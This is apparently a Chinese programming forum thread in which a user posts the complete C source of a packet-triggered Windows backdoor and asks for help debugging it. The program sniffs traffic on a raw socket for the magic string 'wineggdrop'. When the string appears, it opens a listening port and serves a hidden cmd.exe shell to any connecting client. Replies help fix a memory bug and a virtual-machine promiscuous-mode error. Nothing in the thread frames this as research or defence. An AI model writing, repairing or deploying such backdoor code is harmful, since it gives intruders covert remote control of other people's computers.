69,381
社区成员
发帖
与我相关
我的任务
分享高手 帮忙调试下这个程序
其中有一句
char * TcpData=TCPBuffer + TcpHeaderLen;
报错 :error C2440: 'initializing' : cannot convert from 'const char *' to 'char *'
我改成
const char * TcpData=TCPBuffer + TcpHeaderLen;
编译可以通过,只是不知道逻辑上有没有错误
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#pragma comment( lib, "ws2_32.lib" )
// Some Structures To Define
#define IP_HDRINCL 2
#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)
#define MAX_PACK_LEN 65535
#define MAX_ADDR_LEN 16
#define MAX_HOSTNAME_LAN 255
typedef struct _iphdr
{
unsigned char h_lenver;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IP_HEADER;
typedef struct _tcphdr
{
USHORT th_sport;
USHORT th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
USHORT th_win;
USHORT th_sum;
USHORT th_urp;
}TCP_HEADER;
// Global Variable
char SourceIPAddress[MAX_ADDR_LEN]; // Hold The Source IP(This Can Be Used To Do Reverse Connection)
int BackDoorPort = 0; // The Port Back Door Will Bind
// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL InitSocket();
BOOL DoSniffing();
BOOL DecodeIPPack(const char *Buffer,const int BufferSize);
BOOL DecodeTCPPack(const char * TCPBuffer,const int BufferSize);
BOOL IsWin2KOrAbove();
DWORD WINAPI StartBackDoor(LPVOID Para);
BOOL GetABackDoorShell(const SOCKET ListenSocket);
BOOL SendSocket(const SOCKET ClientSocket,const char *Message);
unsigned int ReceiveMessageFromSocket(const SOCKET ClientSocket,char *Buffer,const int BufferSize);
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration
// Main Function
int main(int argc,char *argv[])
{
if (!IsWin2KOrAbove()) // This System Running This Program Is Not Win 2K Or Above
{
printf("The Program Must Run Under Win 2k Or Above OS\n"); // Display This Message
return -1; // Quit The Program
}
if (argc == 2) // We Get Argument
BackDoorPort = atoi(argv[1]); // Argument One Is The Back Door's Port
else // No Argument
BackDoorPort = 1982; // Back Door's Port Will Be Defined On 1982
if (!InitSocket()) // Fail To Initize Socket
{
printf("Fail To Start Up Winsock\n"); // Display Error Message
return -1; // Quit The Program
}
DoSniffing(); // Do Sniffing
return 0; // Quit The Program
}// End Of Main Function
BOOL InitSocket()
{
WSADATA data;
WORD ver;
ver = MAKEWORD(2,2);
if (WSAStartup( ver, &data )!= 0 )
{
return FALSE;
}
return TRUE;
}// End Of InitSocket Function
BOOL DoSniffing()
{
int Length=0; // Variable To Hold The Receive Buffer Length
char RecvBuf[MAX_PACK_LEN] = {0}; // Receive Buffer
SOCKET SocketRaw = INVALID_SOCKET; // Raw Socket
SocketRaw = socket(AF_INET , SOCK_RAW , IPPROTO_IP); // Create A Raw Socket
if (SocketRaw == INVALID_SOCKET) // Fail To Create A Raw Socket
{
printf("Fail To Create A Raw Socket\n"); // Display Error Message
return FALSE; // Return False
}
//char FAR name[MAX_HOSTNAME_LAN];
char name[MAX_HOSTNAME_LAN];
if (gethostname(name, MAX_HOSTNAME_LAN) == SOCKET_ERROR) // Fail To Get The Host Name
{
printf("Fail To Get Host Name\n"); // Display Error Message
closesocket(SocketRaw); // Close The Raw Socket Created
return FALSE; // Return False
}
// The Below Is The NIC Stuff
//struct hostent FAR * pHostent;
struct hostent * pHostent;
pHostent = (struct hostent * )malloc(sizeof(struct hostent)); // Allocate Hostent Buffer
pHostent = gethostbyname(name);
SOCKADDR_IN sa;
sa.sin_family = AF_INET; // That's Internet Related
sa.sin_port = htons(0); // Any Port Avariable On The OS
if (pHostent->h_addr_list[0] != 0) // We Only Check The First NIC
{
memcpy(&sa.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], pHostent->h_length); // We Use The First NIC As The Sniffing Subject
}
else // Well,The First NIC Is Not Valid
{
printf("Get Host By Name Fails\n"); // Display Error Message
free(pHostent); // Free The Hostent Buffer
closesocket(SocketRaw);
return FALSE; // Return FALSE;
}
free(pHostent); // Free The Hostent Buffer
if (bind(SocketRaw, (PSOCKADDR)&sa, sizeof(sa)) == SOCKET_ERROR) // Bind The Raw Socket On The First NIC,But Fails
{
printf("Fail To Bind\n"); // Display Error Message
closesocket(SocketRaw); // Close The Raw Socket
return FALSE; // Return False
}
// Forget About The Below A Few Lines,They Are Just A Static Routine To Do The None_Driver Sniffing(Some Sort Of Must-Have Codes)
DWORD dwBufferLen[10] ;
DWORD dwBufferInLen = 1 ;
DWORD dwBytesReturned = 0 ;
if (WSAIoctl(SocketRaw, SIO_RCVALL,&dwBufferInLen, sizeof(dwBufferInLen),&dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL) == SOCKET_ERROR)
{
closesocket(SocketRaw);
return FALSE;
}
while(TRUE) // Sniffing Starts Here With Forever Loop
{
memset(RecvBuf, 0, sizeof(RecvBuf)); // Reset The Receive Buffer
Length = recv(SocketRaw, RecvBuf, sizeof(RecvBuf), 0); // Try To Receive Data
if (Length == SOCKET_ERROR) // Get Error As Receiving Data
{
printf("Fail To Receive Data\n"); // Display Error Message
break; // Leave The Loop
}
if (DecodeIPPack(RecvBuf,Length)) // Decode The Buffer Received,And The Active Code Is Found
{
printf("Bingo,The BackDoor Is Activated On Port %d\n",BackDoorPort); //We Are Going To Activate The BackDoor
DWORD dwThreadID;
HANDLE BackDoorThread = CreateThread(NULL,0,&StartBackDoor,NULL,0,&dwThreadID); // Create The Back Door Thread
WaitForSingleObject(BackDoorThread,INFINITE); // Wait Until The Back Door Ends
}
}
closesocket(SocketRaw); // Close The Raw Socket
return TRUE; // Return
}// End Of DoSniffing Function
BOOL DecodeIPPack(const char *Buffer,const int BufferSize)
{
IP_HEADER *pIpheader; // IP Header
SOCKADDR_IN saSource;
//SOCKADDR_IN saSource, saDest;
pIpheader = (IP_HEADER *)Buffer; // Transfer The Buffer Into IP Header Form
int Protocol = pIpheader->proto; // Get The Protocol
if ((Protocol != IPPROTO_TCP)) // Not TCP Protocol
{
return FALSE; // Return False Since We Only Interest In TCP Protocol
}
saSource.sin_addr.s_addr = pIpheader->sourceIP;
strncpy(SourceIPAddress, inet_ntoa(saSource.sin_addr), MAX_ADDR_LEN); // Get The Source IP(Important For Doing Reverse Connection)
int IPLength = sizeof(unsigned long) * (pIpheader->h_lenver & 0xf); // Get The IP Length
return DecodeTCPPack(Buffer+IPLength, BufferSize); // Decode TCP Packer
}// End Of DecodeIPPack Function
BOOL DecodeTCPPack(const char * TCPBuffer,const int BufferSize)
{
TCP_HEADER * pTcpHeader; // TCP Header
int iSourcePort,iDestPort; // Source Port And DestPort
pTcpHeader = (TCP_HEADER * )TCPBuffer; // Transfer The Buffer Into TCP Header Form
int TcpHeaderLen = pTcpHeader->th_lenres>>4; // Get The TCP Leader Length
TcpHeaderLen *= sizeof(unsigned long);
const char * TcpData=TCPBuffer + TcpHeaderLen; // Get The TCP Data
//char * TcpData=TCPBuffer + TcpHeaderLen; // Get The TCP Data
iSourcePort = ntohs(pTcpHeader->th_sport); // Get The Source Port
iDestPort = ntohs(pTcpHeader->th_dport); // Get The Destination Port
if (strstr(TcpData,"wineggdrop")!=NULL) // If The TCP Data Contains A Word "wineggdrop"(The Active Code),Then Bingo
{
printf("%s:%d-->Local:%d\r\n",SourceIPAddress,iSourcePort,iDestPort); // Display A Message
return TRUE; // Return TRUE(The Back Door Will Be Activated Soon)
}
return FALSE; // We Didn't Receive An Active Code,Return False
}// End Of DecodeTCPPack Function
BOOL IsWin2KOrAbove()
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (GetVersionEx(&OSVersionInfo)) // Get The OS Version
return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) && (OSVersionInfo.dwMajorVersion == 5)); // Return Whether It's Win 2k Or Above OS
else
return FALSE; // Fail To Get The OS Version,Just Return FALSE
}// End Of IsWin2KOrAbove Function
BOOL SendSocket(const SOCKET ClientSocket,const char *Message)
{
return (send(ClientSocket,Message,strlen(Message),0)!=SOCKET_ERROR);
}// End Of SendSocket
...全文
请发表友善的回复…
发表回复
wjp9981 2013-05-24
- 打赏
- 举报
pHostent = (struct hostent * )malloc(sizeof(struct hostent)); //这一句不用。
//因为gethostbyname返回的是指针啊,不是一个具体的对象。所以不用分配内存。
pHostent = gethostbyname(name);
//free错的原因是,你实际释放gethostbyname(name);返回的指针的内容。而不是你用malloc分配的内容。
AnYidan 2013-05-17
- 打赏
- 举报
pHostent 是malloc 的值吗?
蠓虫带着秤砣飞 2013-05-17
- 打赏
- 举报
这个还真不清楚。。。。虚拟机不太熟。。。
赵4老师 2013-05-17
- 打赏
- 举报
崩溃的时候在弹出的对话框按相应按钮进入调试,按Alt+7键查看Call Stack里面从上到下列出的对应从里层到外层的函数调用历史。双击某一行可将光标定位到此次调用的源代码或汇编指令处。
判断是否越界访问,可以在数组的最后一个元素之后对应的地址处设置数据读写断点。如果该地址对应其它变量干扰判断,可将数组多声明一个元素,并设置数据读写断点在该多出元素对应的地址上。
wjp9981 2013-05-17
- 打赏
- 举报
在虚拟机里运行 为啥会有下面的提示呢?
The virtual machine's operating system has attempted to enable promiscuous mode on adapter Ethernet0. This is not allowed for security reasons.
Please go to the Web page "http://vmware.com/info?id=161" for help enabling promiscuous mode in the virtual machine.
蠓虫带着秤砣飞 2013-05-17
- 打赏
- 举报
不太明白你说的 不用前面那一句 是哪一句。
另外 不用 free 怎么释放内存呢?[/quote]
pHostent = (struct hostent * )malloc(sizeof(struct hostent)); //这一句不用。
//因为gethostbyname返回的是指针啊,不是一个具体的对象。所以不用分配内存。
pHostent = gethostbyname(name);
//free错的原因是,你实际释放gethostbyname(name);返回的指针的内容。而不是你用malloc分配的内容。
wjp9981 2013-05-17
- 打赏
- 举报
不太明白你说的 不用前面那一句 是哪一句。
另外 不用 free 怎么释放内存呢?
蠓虫带着秤砣飞 2013-05-17
- 打赏
- 举报
pHostent = (struct hostent * )malloc(sizeof(struct hostent)); // Allocate Hostent Buffer
pHostent = gethostbyname(name);
---------------------------
不用前面那一句。
直接用第二句。不用free。
wjp9981 2013-05-17
- 打赏
- 举报
free(pHostent); // Free The Hostent Buffer
跟踪到这一句 就出错了。 不知道什么原因啊。
wjp9981 2013-05-17
- 打赏
- 举报
DWORD WINAPI StartBackDoor(LPVOID Para)
{
struct sockaddr_in srv;
SOCKET ListenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); // Create A TCP Socket
if (ListenSocket == INVALID_SOCKET) // Fail To Create A TCP Socket
{
printf("Fail To Create A BackDoor Socket\n"); // Display Error Message
return -1; // Return
}
srv.sin_family = AF_INET; // Internet Related
srv.sin_addr.s_addr = htonl(INADDR_ANY); // Any Address
srv.sin_port = htons(BackDoorPort); // Back Door Port
if (bind(ListenSocket,(const struct sockaddr *) &srv,sizeof(srv)) == INVALID_SOCKET) // Fail To Bind The Socket
{
printf("Fail To Bind BackDoor Sokcet\n"); // Display Error Message
closesocket(ListenSocket); // Close The Socket
return -1; // Return
}
if (listen(ListenSocket,1) == INVALID_SOCKET) // Fail To Listen On The Back Door's Port
{
printf("Fail To Listen\n"); // Display Error Message
closesocket(ListenSocket); // Close The Socket
return -1; // Return
}
SOCKET AcceptSocket = accept(ListenSocket, NULL,NULL); // Accepting Connections
if (AcceptSocket == INVALID_SOCKET) // Fail To Accept Connection
{
printf("Fail To Accept Connection\n"); // Display Error Message
closesocket(ListenSocket); // Close The Socket
return -1; // Return
}
GetABackDoorShell(AcceptSocket); // Get A CMD Shell
closesocket(AcceptSocket); // Close Accpeted Socket
closesocket(ListenSocket); // Close The Listen Socket
return 0; // Return
}// End Of StartBackDoor Function
//--------------------------------------------------------------------------------
// Purpose: To To The Shell Stuff
// Return Type: Boolean
// Parameters: const SOCKET ListenSocket --> The Client Connected Socket
//--------------------------------------------------------------------------------
BOOL GetABackDoorShell(const SOCKET ListenSocket)
{
char ReceiveBuffer[MAX_PATH + 1]; // The Receive Buffer
char SendBuffer[1024 * 4]; // The Send Buffer
unsigned long OutputLength,InputLength; // The Input And Output Length
// The Pipe And Some Other Sutff
HANDLE ClientReadPipe = NULL;
HANDLE ClientWritePipe = NULL;
HANDLE CmdWritePipe = NULL;
HANDLE CmdReadPipe = NULL;
SECURITY_ATTRIBUTES sa = {0};
STARTUPINFO si = {0};
PROCESS_INFORMATION pi = {0};
ZeroMemory(ReceiveBuffer,sizeof(ReceiveBuffer));
if (GetSystemDirectory(ReceiveBuffer,MAX_PATH)) // Get System Directory
{
strcat(ReceiveBuffer,"\\cmd.exe"); // Get The Cmd.exe Full Path
}
else // Fail To Get System Directory
{
SendSocket(ListenSocket,"Fail To Get System Diretory\r\n"); // Display Error Message
return FALSE; // Return
}
// Initize The Stuff
sa.nLength = sizeof(sa);
sa.bInheritHandle = TRUE;
sa.lpSecurityDescriptor = NULL;
memset(&pi,0,sizeof(pi));
if (!CreatePipe(&ClientReadPipe,&CmdWritePipe,&sa,0)) // Fail To Create Client Read Pipe
{
SendSocket(ListenSocket,"Fail To Create Client Read Pipe\r\n"); // Display Error Message
goto CleanUP; // Leave
}
if (!CreatePipe(&CmdReadPipe,&ClientWritePipe,&sa,0)) // Fail To Create Cmd Read Pipe
{
SendSocket(ListenSocket,"Fail To Create CMD Read Pipe\r\n"); // Display Error Message
goto CleanUP; // Leave
}
// Reset And Initize Stuff
memset((void *)&si,0,sizeof(si));
memset((void *)&pi,0,sizeof(pi));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = CmdReadPipe; // Pass The CmdReadPipe To StdInput
si.hStdError = CmdWritePipe; // Pass The CmdWritePipe To StdError
si.hStdOutput = CmdWritePipe; // Pass The CmdWritePipe To StdOutput
if (!CreateProcess(ReceiveBuffer,NULL,NULL,NULL,1,0,NULL, NULL,&si,&pi)) // Fail To Create A Cmd Shell Process
{
SendSocket(ListenSocket,"Fail To Create Process\r\n"); // Display Error Message
goto CleanUP; // Leave
}
while(TRUE) // Shell Commincation Starts Here
{
if (!PeekNamedPipe(ClientReadPipe,SendBuffer,sizeof(SendBuffer),&OutputLength,NULL,NULL)) // Fail To Get Data From The Pipe
{
SendSocket(ListenSocket,"Fail To Peek Name Pipe\r\n"); // Display Error Message
break; // Leave
}
if (OutputLength > 0) // Get Data From The Pipe Successfully
{
ZeroMemory(SendBuffer,sizeof(SendBuffer)); // Reset The Send Buffer
if (!ReadFile(ClientReadPipe,SendBuffer,OutputLength,&OutputLength,0)) //Fail To Read The Data
{
SendSocket(ListenSocket,"Fail To Read File\r\n"); // Display Error Message
break; // Leave
}
if (send(ListenSocket,SendBuffer,OutputLength,0) == SOCKET_ERROR) // Fail To Send The Data
{
printf("Fail To Send Buffer\n"); // Display Error Message
break; // Leave
}
}
else
{
ZeroMemory(ReceiveBuffer,sizeof(ReceiveBuffer)); // Reset Receive Buffer
InputLength = ReceiveMessageFromSocket(ListenSocket, ReceiveBuffer, sizeof(ReceiveBuffer)); // Receive Input From Client
if (InputLength == SOCKET_ERROR) // Fail To Receive Data
{
printf("Fail To Receive Buffer\n"); // Display Error Message
break; // Leave
}
if (!WriteFile(ClientWritePipe,ReceiveBuffer,InputLength,&InputLength,0)) // Fail To Write The Received Data To The Pipe
{
printf("Fail To Write File\n"); // Display Error Message
break; // Leave
}
// Leave The Shell
if (strnicmp((char*)ReceiveBuffer, "exit\r\n", 6) == 0 || strnicmp((char*)ReceiveBuffer, "exit\r", 5)==0 || strnicmp((char*)ReceiveBuffer, "exit\n", 5)==0)
break;
}
}
// Clean All Resource Allocated
CleanUP:
if (CmdReadPipe != NULL)
CloseHandle(CmdReadPipe);
if (CmdWritePipe != NULL)
CloseHandle(CmdWritePipe);
if (ClientReadPipe != NULL)
CloseHandle(ClientReadPipe);
if (ClientWritePipe)
CloseHandle(ClientWritePipe);
return TRUE;
}// End Of GetABackDoorShell Function
//--------------------------------------------------------------------------------
// Purpose: To Receive Data From Socket In A Custom-Defined Way
// Return Type: unsigned int
// Parameters: 1.const SOCKET ClientSocket --> The Client Connected Socket
// 2.char *Buffer --> Buffer To Hold Data Received
// 3.const int BufferSize --> The Buffer Size
//--------------------------------------------------------------------------------
unsigned int ReceiveMessageFromSocket(const SOCKET ClientSocket,char *Buffer,const int BufferSize)
{
ZeroMemory(Buffer,BufferSize); // Reset The Buffer
if (BufferSize < 2) // Buffer Size Is Less Then 2
{
return 0; // Dump
}
int CharacterCount = 0;
//unsigned int CharacterCount = 0;
while(TRUE)
{
if (CharacterCount >= BufferSize) // The Characters Received Is Bigger Or Equal The Buffer Size
{
// Give The Buffer An Enter
Buffer[BufferSize-2] = '\r';
Buffer[BufferSize-1] = '\n';
return CharacterCount; // Return The Characters Received
}
if (recv(ClientSocket,Buffer+CharacterCount,1,0) == SOCKET_ERROR) // Fail To Receive Data
{
return SOCKET_ERROR; // Return Error
}
if (Buffer[CharacterCount] == '\b') // Back Space Detected
{
Buffer[CharacterCount] = '\0'; // Skip It
if (CharacterCount > 0) // Characters Received Is Bigger Than 0
{
CharacterCount--; // Decrease One Character
Buffer[CharacterCount] = '\0';
}
continue; // Begin A New Loop
}
if (Buffer[CharacterCount++] == '\n') // Enter Is Detected
{
return CharacterCount; // Return The Characters Received
}
}
return 0; // We Get Nothing,Return Zero
}// End Of ReceiveMessageFromSocket Function
// End Of File
蠓虫带着秤砣飞 2013-05-17
- 打赏
- 举报
单步跟踪吧。。。
